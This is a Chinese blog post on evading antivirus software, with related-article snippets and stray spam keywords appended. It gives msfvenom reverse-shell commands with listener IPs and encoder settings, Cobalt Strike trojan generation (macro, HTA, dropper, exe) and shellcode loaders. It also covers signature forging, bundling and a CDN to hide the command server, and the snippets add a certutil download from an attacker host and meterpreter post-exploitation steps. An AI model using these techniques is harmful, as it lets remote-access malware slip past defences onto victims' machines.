<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    殺毒與免殺技術詳解--白嫖黨福音

    VSole2021-12-04 07:10:15

    0x01 簡介

    不管是社工釣魚,還是一句話木馬getshell,遠控,亦或者是反彈shell,都會遇到殺軟waf這些大敵,當然主要還是殺軟,因此我們不得不考慮免殺進而實現我們滲透測試目的。

    0x02 概念

    2.1 免殺類別

    簡單總結下我知道的免殺類別:

    一句話木馬繞狗(我覺得他不應該出現在這里,但為了致敬我學習的第一個免殺,把他放了出來)

    文件不落地
    shellcode加密
    修改源碼增加花指令
    DLL加載
    自定義加載器
    指定特定的運行方式
    加殼

    當然還可以按照大的類別劃分

    靜態掃描免殺
    內存掃描免殺
    流量分析免殺
    行為分析免殺
    逆向分析免殺
    機器學習免殺

    由于弟弟水平有限,知道的東西很少(流量分析,逆向分析一點不懂,機器學習更是一臉懵逼),望哥哥們見諒,當然最好能留下些建議或者私下能和弟弟交流下。

    2.2 免殺工具

    推薦一些公開流傳的k8工具:

    文字:

    sc加載器(具體下面有介紹)
    K8免殺系統自帶捆綁器加強版V2.0
    K8數字簽名添加器
    K8隨機免殺花指令生成器V2.0(只是生成花指令)

    圖片:

    大概的總結下k8工具過免殺思路吧:

    1.sc加載器實現繞過,原理在于加密
    2.利用其他安全軟件的數字簽名,進行繞過
    3.捆綁正常的軟件,進行繞過
    4.增加沒有實用效果的花指令進行繞過(花指令需要自己加然后編譯)

    既然是免殺,當然不能忘記cs:

    cs(Cobalt Strike)的話我只有三個版本,v3的兩個版本,還有v4.0的,cs是一個強大的免殺工具,并且支持c2在線團隊使用。對于很多大佬來說肯定是十分熟悉的,弟弟我只能簡單的介紹下其簡介:

    cs擁有多種協議主機上線方式,集成了提權,憑據導出,端口轉發,socket代理,office攻擊,文件捆綁,釣魚等功能。同時,cs還可以調用Mimikatz等其他知名工具。

    0x03 實踐

    說的再多也不如拿真實情況來說話,實踐主要對上述的六種工具做下簡單的使用,并利用線上沙箱進行簡單的查殺檢測。

    3.1:Cobalt Strike-3.12

    因為是淺談,再有就是我實在是太懶了,能縮水就縮水,求饒過別打我。

    3.1.1:安裝sever

    我用的啊某云的云當的sever,這里需要注意的是只能用linux的,并且安裝好java,3.12的有不同的包,而4.0的只有一個包。接下來主要以3.12為主。

    3.1.2:啟動sever

    啟動的格式:

    ./teamserver <host> <password>
    

    3.1.3:啟動client

    端口50050是默認的。然后用戶名隨意,密碼和host是之前添加的。

    3.1.4:建立一個監聽

    根據自己的需要建立一個監聽

    3.1.5:生成一個exe

    當然還可以生成別的,這里只做測試,簡略操作,不然光cs就能寫一個系列。

    當然還有其他格式的木馬

       HTML Application 生成惡意的HTA木馬文件;

       MS Office Macro 生成office宏病毒文件;

       Payload Generator 生成各種語言版本的payload;

       USB/CD AutoPlay 生成利用自動播放運行的木馬文件;

       Windows Dropper 捆綁器,能夠對文檔類進行捆綁;

       Windows Executable 生成可執行exe木馬;

       Windows Executable(S) 生成無狀態的可執行exe木馬

    3.1.6:目標上線

    之后就可以實遠控了,輕則控制桌面,重則橫向,獲取域控,但要時刻謹記網絡安全法,做有授權合法的滲透。

    放張圖,自己看:

    3.1.7:在線沙盒查殺

    直接放個查殺結果連接:

    https://r.virscan.org/language/zh-cn/report/855d5e6b12061dd0da0d048458ef7441

    3.1.8:總結

    為了更加真實我用的本機打開的木馬,火狐全程無提醒,但是通過流量分析和走向能發現。

    這里是能獲取到遠程ip的,但是如果我們換個騷思路,加個cdn,他還咋發現emmm。當然cs的功能還有很多,這里只做簡單介紹。

    3.2 k8工具

    k8工具,流傳的比較廣,因此有些免殺效果一般,而sc加載器利用原理不外乎是加密。

    3.2.1:羅列下工具

       [+] 免殺工具 scrunBase64 ShellCode免殺加載器(CS & MSF)

       [+] 免殺工具 scrunBase32 ShellCode免殺加載器(CS & MSF)

       [+] 免殺工具 scrun.exe & scrun.py ShellCode免殺加載器(CS & MSF)

       [+] 免殺工具 K8SCENCODE(CS & Msf免殺工具).rar

       [+] 免殺工具 K8隨機免殺花指令生成器V2.0.exe

       [+] 免殺工具 K8數字簽名添加器.exe

       [+] 捆綁工具 K8免殺系統自帶捆綁器加強版V2.0.EXE

    接下來主要說下sc加載器,因為其他的捆綁或者數字簽名軟件完全是傻瓜操作,花指令更是知識和生成花指令,編譯還得自己整,當時做的截圖找不到了,我也不想再做一遍了。。。

    3.2.2:利用msf生成個shellcode先(用cs也可以)

    msf生成shellcode命令:

    msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c
    

    3.2.3:將shellcode轉化為hex格式,再利用sc加載器加載:

    3.2.4:msf發現上線

    3.2.5:在線沙盒查殺

    用的txt,因為是無文件落地:

    https://r.virscan.org/language/zh-cn/report/69f9ffe3e1a9780d0e1d2942efa203d2

    3.2.6:總結

    簡單的說下優缺點吧:

    優點:無文件落地,避免了防火墻,無樣本可以分析。

    缺點:需要sc加載器,不然沒效果,不落地方案操作會被提醒。

    3.3 msf生成木馬

    這個應該很簡單吧,做下簡單介紹吧,如果想利用更的操作,可以show paload,根據自己需求。

    3.3.1 生成exe木馬

    生成命令:

    msf -p windows/shell_reverse_tcp LHOST=192.168.111.139 LPORT=1235 -e x86/shikata_ga_nai -i 12 -b '\x00' -f exe > shell.exe
    

    附圖:

    為了照顧新加入的哥哥,貼下msf opthions:

    -p, —payload  指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, —list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all-n, —nopsled  為payload預先指定一個NOP滑動長度-f, —format  指定輸出格式 (使用 —help-formats 來獲取msf支持的輸出格式列表)-e, —encoder [encoder] 指定需要使用的encoder(編碼器)-a, —arch  指定payload的目標架構—platform  指定payload的目標平臺-s, —space  設定有效攻擊荷載的最大長度-b, —bad-chars  設定規避字符集,比如: '\x00\xff'-i, —iterations  指定payload的編碼次數-c, —add-code  指定一個附加的win32 shellcode文件-x, —template  指定一個自定義的可執行文件作為模板-k, —keep 保護模板程序的動作,注入的payload作為一個新的進程運行—payload-options 列舉payload的標準選項-o, —out  保存payload-v, —var-name  指定一個自定義的變量,以確定輸出格式—shellest 最小化生成payload-h, —help 查看幫助選項—help-formats 查看msf支持的輸出格式列表
    

    3.3.2:在線查殺

    附上在線查結果連接:

    https://r.virscan.org/language/zh-cn/report/adbcb14c4708ea7bf7f6f6c6668d1b70

    如果想要繞過更多殺軟,例如360,可以進行加鹽處理,就是生成c語言shellcode,之后添加無用的東西。

    3.3.3:總結

    Metasploit是最為常用的滲透框架,他包含了世界上最大而且經過測試攻擊的代碼數據庫。所以,熟練掌握Metasploit也是一個滲透人員的基本功吧,所以這個地方沒寫 太多。

    免殺原理:利用msf加載器,對我們攻擊載荷文件進行重新的排列編碼,改變可執行文件中的代碼形狀,避免被殺軟認出

    優點:操作簡單,代碼數據庫多。

    局限:不適合團隊合作使用,在真實對抗中,需要實現長期維持的目的,因此更會有傾向的選擇相應工具,包括c2框架(弟弟單純的想法,如有錯誤,請哥哥們指正)

    3.4 其他c2框架生成shellcode

    除了cs,msf以外我個人還比較喜歡用帝國(empire),當然還是根據個人喜好來,我會附上幾款read-team框架供哥哥們參考,在此不做贅述。

    0x04 碎碎念

    我在這里挖了個坑,有些東西沒有詳細介紹,例如cs,還有一些免殺方法也沒有實踐舉例(例如DLL加載,自定義加載器,指定特定的運行方式,加殼,還有我不會的流量分析)。

    其實是有筆記在的,但是!但是!我想多要幾個贊,我之前發表的文章有些一個贊都沒有的說,明明是有人看的(例如AI王者榮耀),點贊量滿意了,妹妹就放出來更多干貨:

    免殺系列相關的內容:其他好用的c2框架以及簡單使用,cs的更多利用方式

    其他會的一些東西和筆記:一些社工奇淫技巧,一些很騷的wenshell木馬原理,低中高交互的蜜罐以及搭建,beef的高級應用,朔源取證工具使用,內網滲透思路,提權,哪怕信息收集都是有一些東西在的

    好了以上都是妹妹的碎碎念,其實我都不會的,我就是吹吹牛,記得點贊哦。

    原文鏈接:https://python1.blog.csdn.net/article/details/112661486?spm=1001.2101.3001.6650.15&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-15.highlightwordscore&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-15.highlightwordscore
    
    免殺msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    1、文檔連接釣魚 1)LINK鏈接釣魚 2)LINK快捷方式釣魚 3)CHM文檔釣魚 CHM文檔bypass waf 4)HTA釣魚 5)宏釣魚 宏釣魚 bypass waf 6)OLE(Object Linking and Embedding,對象鏈接與嵌入) 7)嵌入JS元素 8)利用模板文件注入宏指令 9)CVE 2、偽造界面釣魚 1)PPT動
    連上Webshell后發現執行不了任何命令,連常規的set、ver、whoami等命令都不行,EXE就更不用說了。執行時會卡一段時間,沒有回顯,也不顯示:拒絕訪問,說明不是360和火絨攔的。
    技術全稱為反殺毒技術 Anti-Virus 簡稱“”,它指的是一種能使病毒木馬免于被殺毒軟件查殺的技術。由于技術的涉獵非常廣,其中包含反匯編、逆向工程、系統漏洞等技術,內容基本上都是修改病毒、木馬的內容改變特征碼,從而躲避了殺毒軟件的查殺。
    生成PayloadMetasploit,輸出c、py格式,可用xor、xor_dynamic、zutto_dekiru編碼器。CobaltStrike,這里選擇使用x64的C語言或Python語言的Shellcode。
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,作者的github保持更新,可以去瞅瞅。測試可以國內軟?注意:ShellCode 需要是64位的加載器將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處注意:保留原始ShellCode 里的雙引號 "示例:最終格式:打包成可執行程序編譯Python 3.8.6pyinstaller 4.7pip install pyinstaller
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender。代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,保持更新。
    知識匯總
    2021-08-25 23:11:00
    知識匯總
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类